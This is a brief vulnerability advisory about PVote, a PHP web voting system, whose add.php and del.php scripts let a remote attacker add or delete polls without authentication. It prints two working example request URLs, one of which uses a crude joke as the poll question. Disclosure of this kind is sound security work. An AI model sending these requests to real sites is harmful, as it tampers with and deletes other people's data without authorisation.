source: https://www.securityfocus.com/bid/4540/info
PVote is a web voting system written in PHP. It will run on most Unix and Linux variants as well as Microsoft Windows operating systems.
It is possible for a remote attacker to add/delete web polls just by manipulating the values of URL parameters.
ADD A POLL:
http://target/pvote/add.php?question=AmIgAy&o1=yes&o2=yeah&o3=well..yeah&o4
=bad
where question refers to the topic of the topic to be added by the attack.
DELETE A POLL:
http://target/pvote/del.php?pollorder=1
where pollorder is the poll 'id' number for the poll to be deleted.
